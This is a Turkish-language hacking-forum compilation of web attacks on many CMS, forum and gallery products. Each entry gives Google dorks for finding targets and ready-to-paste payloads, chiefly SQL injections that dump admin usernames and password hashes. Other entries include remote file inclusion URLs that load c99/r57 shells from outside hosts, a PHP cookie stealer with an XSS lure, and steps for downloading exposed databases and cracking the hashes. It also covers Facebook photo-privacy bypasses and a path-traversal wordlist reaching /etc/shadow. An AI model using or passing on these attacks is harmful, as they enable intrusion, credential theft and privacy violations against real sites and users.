Example (Exploid): http://site.de/allmyguest/index.php?...ull+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1--




123FlashChat Açığı

DORKS : "123flashchat.php"

EXPLOITS :
Http://localhost/path/123flashchat.php?e107path=Shell




AlphaContent 2.5.8 © Açığı

DORK 1 : inurl: "com_alphacontent"

DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"

Exploit :

index.php?option=com_alphacontent&section=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*




Mambo Component (com-downloads) Açığı

DORK : allinurl :"com_downloads"filecatid

EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*




MiniNuke 2.1 Açığı

DORK 1 : allinurl:"members.asp?action"

DORK 2 : allinurl: "members.asp"uid

EXPLOIT 1 :

members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members

EXPLOIT 2 :

members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members

EXPLLOIT 3 :

members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers




Modules-Wepchat Açığı

DORK : allinurl :"modules/WebChat"

EXPLOIT :

modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201




Modules-Repice Açığı

DORK : allinurl :"modules/recipe"

EXPLOIT :

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*




eXV2 MyAnnonces Açığı

DORK : eXV2 MyAnnonces

EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201




Modules-Dictionary Açığı

DORK 1 : allinurl: "modules/dictionary"

DORK 2 : allinurl: "modules/dictionary/print.php?id"

EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

Geçerli versiyonlar;

Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch




Com-Restaurante Açığı

DORK : allinurl: "com_restaurante"

EXPLOIT :

index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*




Com-Accombo Açığı

DORK : allinurl: "com_accombo"

EXPLOIT :

index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*




Powered By Runcms Açığı

DORK 1 : allinurl: "modules/photo/viewcat.php?id"

DORK 2 : inurlhoto "powered by runcms"

EXPLOIT :

admin/exploit

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass/exploit

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Not: Admin/exploit'i site sonuna yapıştırırsak admin nick verir.
Pass/exploit'i yapıştırırsak md5 leri verir.

Admin girişi:
http://www.bbb.net/admin




Powered By Download 3000 Açığı

DORK 1 : "Powered by Download 3000"

DORK 2 : allinurl: "com_d3000"

EXPLOiT :

index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*




Powered By Smoothflash Açığı

DORK 1 : "Powered by Smoothflash"

DORK 2 : allinurl: "admin_view_image.php"

EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users




Com-Ahsshop Açığı

DORK : allinurl: "com_ahsshop"do=default

EXPLOiT 1 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*

EXPLOiT 2 :

index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*




Mod-Archives Açığı

DORK : allinurl: "index.php?mod=archives"

EXPLOiT :

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*




Galery-Action Açığı

DORK : allinurl: "index.php?mod=galerie"action=gal

EXPLOiT :

index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*




Powered By Site Sift Açığı

DORK 1 : powered by Site Sift

DORK 2 : allinurl: "index php go addpage"

DORK 3 : allinurl: "index.php?go=detail id="

EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*

EXPLOİT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*




Galery-İmg Açığı

DORK : allinurl: "index.php?p=gallerypic img_id"

EXPLOiT 1:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user

EXPLOiT 2:

index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user




Galid-Galeri Açığı

DORK : allinurl: galid "index.php?p=gallerypic"

EXPLOiT :

index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user




Area-Galid Açığı

DORK : allinurl: "index.php?area"galid

EXPLOiT :

index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user




Shop-Categ Açığı

DORK : allinurl: "index php p shop"categ

EXPLOiT :

index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user




Showlink Açığı

DORK : allinurl: "index.php?showlink"links

EXPLOiT :

index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php




RS MAXSOFT Açığı

DORK 1 : "RS MAXSOFT"

DORK 2 : "Provozováno na RS MAXSOFT"

EXPLOiT:

modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin




PollBooth Açığı

DORK : allinurl: "pollBooth.php?op=results"pollID

EXPLOiT :

pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users




Showresult Açığı

DORK 1 : allinurl: "index.php?p=poll"showresult

DORK 2 : allinurl: poll_id "showresult"

EXPLOiT :

index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user




Fpdb/shop.mdb Açığı

google.com 'da aratacağız;
inurl:"mall/lobby.asp

Sonra çıkan sitenin sonuna ''fpdb/shop.mdb'' ekleyin "tırnaksız".

örnek: Gem Depot Lobby Page - Search our Inventory

http://www.gemdepot.com/fpdb/shop.mdb

mdb diye dosya çıktı farklı kaydet diyoruz ve açıyoruz...

mdb gizlenmiş şifreyi alıp md5 kırıcı sitede kırıyoruz ve siteye giriş yapıp hackliyoruz...




Xopps Açığı

Dork: inurl:/modules/wfsection/

Exploide:

print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*




Com_shambo2 Açığı

Dork(Googlede Aratacağımız Kod): "inurl:com_shambo2" (Tırnaklar yok.)

Exploid(Site Sonuna Ekleyeceğimiz Kod);

index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users




PHP-Calendar Açığı

Arama : google.com => intitle:"EasyPHPCalendar

Site sonuna(Herhangi biri);

/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps



----------------------------------------------------------------------------------------------------------------



Php-BB 2.0.18 Yönlendirme Açığı

öncelikle php destekli bi hostunuz olmalıdır. Google Free php host yazdığınız zaman bir sürü site çıkar. Şimdi yeni bi not defteri açın ve içine aynen bunları yazın. Ama en ufak bi kodlama hatasında sistem çalışmaz.

Kod:
<?php
$cookie = $_GET[’c’];
$ip = getenv (’REMOTE_ADDR’);
$date=date("j F, Y, g:i a");
$referer=getenv (’HTTP_REFERER’);
$fp = fopen(’cookies.txt’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br> IP: ’ .$ip. ’<br> Date and Time: ’ .$date. ’<br> Referer: ’.$referer.’<br><br><br>’);
fclose($fp);
?>

Bunu farklı kaydet diyip örneğin ismini cookies.php yapalım. Daha sonra ftp den bu dosyayı hostumuza atalım.

Şimdi bir tane daha not defteri açın içine hiçbirşey yazmayın. Onu da php olarak kaydedelim ve ismini örneğin gelencookieler.php yapalım. Bunu da hostumuza atalım. Ama bu boş bıraktığımız gelencookilere.php dosyasına CHMOD ayarı vereceğiz. Sağ tıklayıp CHMOD a gelelim ve 777 ye ayarlayalım yani "okuma" "yazma" ve "çalıştırma" izni vermiş olacaksınız.

Bunu da hallettikten sonra phpbb 2.0.18 kurulu hedef bi site bulalım. Forumlardan birine bi konu açalım veya imzanızada yazabilirsiniz.

Kod:
<pre a=’>’ onmouseover=’********.********="http://www.sizinsiteniz.com/cookies.php?c="+********.cookie’ b=’<pre’ >

Bu kodu yazıyoruz. Daha sonra sizin imzanıza yada açtığınız konudaki kodu görenlerin cookiesi gelencookieler.php ye dizilecek.




FullXml Açıgı

1.adım: Google a giriyoruz "Fullxml" diye arama yapıyoruz,

2.adım: Seçtiğimiz gözümüze kestirdiğimiz siteye girip sonunua /db/member.xml ekliyoruz.

3.adım: Eğer admin adı ve şifre sorarsa //db/member.xml ekleyerek devam ediyoruz ve orda kullanıcı adları ve şifreler çıkar,

3.adım(2): Eger çıkmaz ise bu site dataları farklı yere saklamıştır. Bu site bu açıkla hacklenemez,

4.adım: Eger girerseniz admin panelinden uploada bastığınız anda dosya upload etmeye geçersınız ordan index'inizi basarsınız.




Bx-cp 0,3 Açığı

Google Dork: "bxcp 0,3"
Karşımıza çıkan sitelerin sonuna şu nu yapıstırmalıyız;

Exploide:
index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0, 0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1

Yönetici nick vs hash-ları verir.

Md5 leri kırabilmeniz için sitelerden bazıları;

http://gdataonline.com/seekhash.php

Plain-Text.info

http://www.milw0rm.com/md5/index.php

cracking.com: The Leading Cracking Site on the Net

http://passcracking.com/Good_values_list.asp

http://www.hashchecker.com/index.php?_sls=info

Uploadpage.net

http://www.cmho.tk/

md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com

crysm.net

http://passcrack.spb.ru




My-PhpNuke'de Açık

Sistemin kodlanması esnasında galeri modülünde yapılan kodlama hataları, sisteme File Include atakları yapılmasına neden olmaktadır.

Code:
include ("$basepath/imageFunctions.php");

Exploit:
/gallery/displayCategory.php?basepath=http://evil_scripts?




ShotCat Açığı

google araması:

allinurl: "showCat.php?cat_id"

site sonuna eklenecek kod:

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

Not: Md5 de kırma istemez,
kullanıcı adları ve pass ları çıkar daha sonra menüde edit kısmı olur.




Com-Cinema Açığı

Aratılacak Kodumuz : allinurl: "com_cinema"

sitenin sonuna eklenecek kod:

index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(u sername,0x3a,password)/**/from/**/jos_users/*

Googlede arattıkdan sonra karşımıza gelen sayfadan her hyangi bir siteyi seçiyoruz vs sitenin sonuna eklenecek kod-u yapıştırıyoruz. MD5 ler elimizde .




Facebook Güvenlik Açıkları

A-)Avatar Açıkları;
Avatarı büyütme... Örnekle açıklayalım: profile.ak.facebook.com/profile5/605/84/s677609740 _9399.jpg Burada gördüğünüz s harfi small’dan geliyor. Eğer onu silip onun yerine n yani normal yazarsak profile.ak.facebook.com/profile5/605/84/n677609740 _9399.jpg bu resmi büyütüp kaydedebiliyoruz. Sadece bu kadar değil. Bu adresteki profile5/605/84 kısmı kişisel güvenlik kısmıdır ama s677609740 ise kişinin kimliği denilebilecek bir numara, 9399 ise resmin ismidir. Aynı kullanıcının daha önce kullandığı avatarların tek farkı bu 9399 numarası olmasıdır. Bu avatarları Flashget’in batch download (toplu dosya indirme) özelliğini kısmına profile.ak.facebook.com/profile5/605/84/s677609740 _(*).jpg yazarak uzunluk olarak 4 karakterli sayılara karşılık gelen tüm avatarları bilgisayarımıza indirebiliyoruz.

B-)Kısıtlı Profili İzinsiz Açtırma;
Normalde profilleri arkadaşı olmayan kişiler tarafından görülmeyen hesaplar sadece mesaj yollanınca açılıyor. Örneğin adını duymadığınız bir kişi size bir mesaj atıyor; siz de doğal olarak cevaplıyorsunuz. Fakat siz mesajı attığınız anda mesajı attığınız kişi için profiliniz açık hale geliyor. Özellikleri kısıtlamış olsanız bile arkadaşlarınızı, resimlerinizi görebiliyor.

C-)Albüm Fotoğraflarını Görme;
Kısıtlı profilleri açtık ama sadece bir kaç resim mi gözüküyor? Tüm albümü görmek de Facebook açıkları sayesinde problem olmuyor. Facebook kullananlar bilir fotoğraftaki kişileri kutu içine alıp bir şeyler yazılabiliyor. Ama bu büyük bir tehlike. Şifreleme iyi olmadığı için başka kişiler de fotoğraflarınızı görebiliyor.
Örneğin photos-571.11.facebook/photos-11-sf2p/v136/48/92/692548571/n692548571_340324_6962.j pg Bu Facebook’un fotoğraf yükleyen üyelerden birine verdiği bir adres. Sadece bu fotoğraf herkese açık, diğerleri sadece arkadaşlarına açık. Yine buradaki photos-571 üye numarasının son 3 rakamı, en sonraki n692548571_340324_6962.jpg ise resmin şifrelenmiş kısa yoludur.[n= normal, 692548571= üye numarası, 340324=fotoğraf numarası, 6962=güvenlik numarası.]
Fakat burada fotoğraf numarasını bir artırır veya azaltır ve Flashget gibi programların batch download komutunu kullanırsak, bu güvenliği kolayca geçebiliyoruz. Facebook, bir resimden diğerine geçerken genelde önceki sayının 400 fazlasına yakın bir sayı üretiyor. Bu yüzden güvenliği kırmak en fazla 5 dakika sürüyor. Örneğin 340325 diğer yani 1 eksiği olan fotoğraf photos-571.11.facebook.com/photos-11-sf2p/v136/48/92/692548571/n692548571_340325_7760.j pg




Smf 1.1.4 RFI Bug Açığı

Google Dork : Powerd by SMF 1.1.4

Açık 1

/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://jadlex.org/shell/c99.txt?

Açık 2

/Sources/Themes.php?settings[theme_dir]=http://jadlex.org/shell/c99.txt?




Phil-board Açıkları

google arama kodu : Powered by Philboard veya İnurl: philboard_forum.asp

İki şekildede aratabilirsiniz

adminin kullanıcı adı için

philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users

parola için:

philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users

yeni başlayanlar için elverişlidir

Dikkat= İyi bir anti-vir kullanmayanlar. Bazı siteler trojan örneği içermekte. Dikkatli olmanızı tafsiye ederim.




vBulletin Yönlendirme Açığı

vBulletin’de Her Sürümünde Top15 Açığı Bulunmuştur Aslında Bu Açık Çoktan Beri Var, ama Bu zamanda Ortaya Çıkmış. Bir vBulletin Sitesine Giriyorsunuz Forum Anasayfasın da Top15 Varsa işe koyuluyoruz;

Şimdi Yeni Konu Açıyorsunuz,( Nereye Açacağınız Fark Etmiyor)

ve

Konunun Başlıgına

******************* **********="*******" *********"0;url=http://www.siteadresi.com"> """" >

Yazmanız yeterli msj bölümüne istediğinizi yazın ...

Eğer açık kapatılmamış ise site yi yönlendirmiş olursunuz.


Bazı Yönlendirmeler;

Resim Çağırma;
<img xsrc=http://www.xxxx.com/resim.jpg>

swf iLe YönLendirme;
<embed xsrc=http://www.xxxx.com/xxxx.swf>

Css Çağırmak;
<link xhref=http://www.xxxx.com/dosya.css type=text/css rel=**********>

Çerçeve (Frame) iLe index;
body topmargin=0 leftmargin=0 onload="********.body.innerHTML='<iframe width=100% height=100% xsrc=http://www.xxxx.com></iframe>';">

StyLe iLe Tam Sayfa Resim Döşemek;
<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.xxxx.com/resim.jpg');}




Advanced Guestbook 2.4.2 Açığı

google dork: Advanced Guestbook 2.4.2 HTML code is enabled

eğer forumun en altında böyle bir yazı varsa= "HTML code is enabled" açık var demektir. Hemen yukardan sign the guestbook sekmesine tıklıyoruz.

Name yerine örnek nick yazıyoruz. Siz nickinizi yazın.

Aşağıya geliYoruz "your message" kısmına yönlendirme kodumuzu yazıyoruz;

<**** **********="*******" *********"0;url=http://www.siteadresiniz.com">

Sonra aşağıdaki güvenlik kodunu yazıP submit-e tıkllıyoruz.




Smf açıkları

Vuln:
Simple Machines SMF 1.1 rc2
Simple Machines SMF 1.0.8

Vuln Olmayanlar:
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.0.9

XSS:
http://www.example.com/index.php?action=login2"><******>alert('turkhackin ')</******>

-------------------------------

Vuln
SMF 1.0.7 ve aşağısı 1.1rc2 ve aşağısı

Banlanan kullnıcılar ip spoof yapıp tekrar girebiliyor..

------------------------------------

Simple Machines Forum, Version 1.1 RC3
Simple Machines Forum (SMF) ManageBoards.php cur_cat Variable SQL Injection

Sql injection mevcut
http://archives.neohapsis.com/archiv...6-09/0009.html

-----------------------------------
Simple Machines Forum <=1.1RC2 unset() vulnerabilities

http://retrogod.altervista.org/smf_11rc2_lock.html




Yeni joomla açıkları 3

Google Araması:
inurl:"com_zoom"

Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_serverstat"

Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://megaturks.by.ru/c99.txt?

Google Araması:
inurl:"com_fm"

Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_mambelfish

Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?

Google Araması:
inurl:com_lmo

Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Bazı joomla açıkları

Google Araması :
inurl:com_mosmedia veya index.php?option=com_mosmedia

Site Sonuna :
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://megaturks.by.ru/r57.txt?

Google Araması :
inurl:com_zoom veya index.php?option=com_zoom

Site Sonuna :
components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
allinurl:com_nfn_addressbook veya inurl:index.php?option=com_nfn_addressbook

Site Sonuna:
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Site Sonuna2:
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?

Google Araması:
inurl:com_moodle

Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?




detail.php?item_id==(SQL) açığı

Exploit in:
detail.php?item_id==(SQL)

Example:
(SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from %20admin/*#




phpBB toplist.php açığı

Google arama

inurl:"toplist.php" "powered by phpbb"

aratıyoruz gelen sitelerin hepsinde deneyin ihtimal war

gelen sitelerde E-Ticaret, Web Tasarım, Hosting, Domain, Fononline Internet Hizmetleri - Siteadi.com buradaki toplist.php önemli sitenin dizini değil sadede geçelim buradaki toplist.php nin yerine alttaki kodu ekliyoruz

toplist.php?f=toplist_top10&phpbb_root_path=Shell Adresiniz

ekledikten sonra Return ve o nadide sayfa ( Açık Warsa Tabi )

toplist.php yerine eklenecek kod örneği

toplist.php?f=toplist_top10&phpbb_root_path=http://kobaytm.3000mb.com/c99.txt?



----------------------------------------------------------------------------------------------------------------



Bu açıkları ister elle teker teker deneyip ister de yazacağınız bir ****** veya programa ekleyerek otomatik olarak tarama yapabilirsiniz.
/./
/..
/../..
/..../
/....../
/....../
/......../
/~
/+/
/+./
/++/
/++./
/%00/
:2301
/2600-cgi/ezmlm-cgi
/%2E%2E
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
:3000/../../hosts
:3128/../../../../
:3128/../../../conf/Eserv.ini
:444/..........autoexec.bat
:5000/
:800/../..
:8000/cgi/wja?page=wja
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/jsp/../../tst.txt
:8000/servlet/ssifilter/../../test.jsp
:8002/Newuser?Image=../../database/rbsserv.mdb
:8003/Display
:800/C:/
:8010/
:8010//
:8010/..../
:8010/c://
:8010/d://
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
:801/../../../../../../../../etc/hosts
:8080/anything.jsp
:8080/../../../conf/Eserv.ini
:8080/examples/jsp/snp/anything.snp
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
:8088
:80/../../../autoexec.bat
:8100//WEB-INF/
:8100//WEB-INF/webapp.properties
:8100//WEB-INF/web.xml
:8383
:8888/
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=percebe
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
:9000/cgi-bin/query%3f
:901
:9090
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
:9998/
/.access
/achg.htr
/active.log
/ad.cgi?file=../../../../../../../../etc/hosts
/admin/
/admin.cgi
/Admin_files/order.log
/admin.htm
/admin.html
/admin/includes/
/admin.php3
/admin.php3?admin=whatever
/admin.pl
/admin-serv/config/admpw
/admin.shtml
/admisapi/fpadmin.htm
/ads/admin.cgi
/ads/adpassword.txt
/adsamples/config/site.csc
/AdvWorks/equipment/catalog_type.asp
/advworks/equipment/catalog_type.asp
/aexp2.htr
/aexp3.htr
/aexp4b.htr
/aglimpse
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0
/aliredir.exe
/....../ all
/../../../../ all
/amadmin.pl
/AnalogX
/anot3.htr
/AnyForm2
/anything.jsp
/architext_query.pl
/args.bat
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/AT-admin.cgi
/auctionweaver.pl
/_AuthChangeUrl
/_AuthChangeUrl?
/authors.pwd
/....../autoexec.bat
/........./autoexec.bat
/......autoexec.bat
/aux
/bash
/.bash_history
/bb-dnbd/bb-hist.sh
/bboard_frames.html
/beaninfo.cfm
/bigconf.cgi
/~bin
/~bin/
/bin
/bin/
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD
/bizdb1-search.cgi
/blabla.ida
/blabla.idc
/blabla.idq
/blabla.idw
/bnbform
/bnbform.cgi
/../../../../../../../boot.ini
/../../boot.ini
/build.cgi
/campas
/carbo.dll
/cart32.exe
/cart.cgi
/catalog.nsf
/catalog.nsf/
/ccbill/
/ccbill/secure/ccbill.log
/cd/../config/html/cnf_gi.htm
/cfappman/index.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/exampleapp/email/application.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/email/getfile.cfm?filename=c:_oot.ini
/cfdocs/exampleapp/email/getfile.cfm?filename=c:_oot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/publish/admin/application.cfm
/cfdocs/examples/cvbeans/beaninfo.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:_oot.ini
/cfdocs/examples/httpclient/mainframeset.cfm
/cfdocs/examples/parks/detail.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/expelvel/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expressions.cfm
/cfdocs/MOLE.CFM
/cfdocs/root.cfm
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexist.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/gettempdirectory.cfm
/cfdocs/snippets/setlocale.cfm
/cfdocs/snippets/viewexample.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/TOXIC.CFM
/cfdocs/zero.cfm
/CFIDE/Administrator/startstop.html
/cfide/Administrator/startstop.html
/cfmlsyntaxcheck.cfm
/cfusion/cfapps/forums/data/forums.mdb
/cfusion/cfapps/forums/forums_.mdb
/cfusion/cfapps/security/data/realm.mdb
/cfusion/cfapps/security/realm_.mdb
/cfusion/database/cfexamples.mdb
/cfusion/database/cfsnippets.mdb
/cfusion/database/cypress.mdb
/cfusion/database/smpolicy.mdb
/cgi
/cgi/
/cgi-bin
/cgi-bin/
/cgibin
/cgibin/
/cgi-bin/abuse.man?file=&domain=&******=
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/cgi-bin/add_ftp.cgi
/cgi-bin/admin.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.cgi
/cgi-bin/ads.setup
/cgi-bin/af.cgi
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
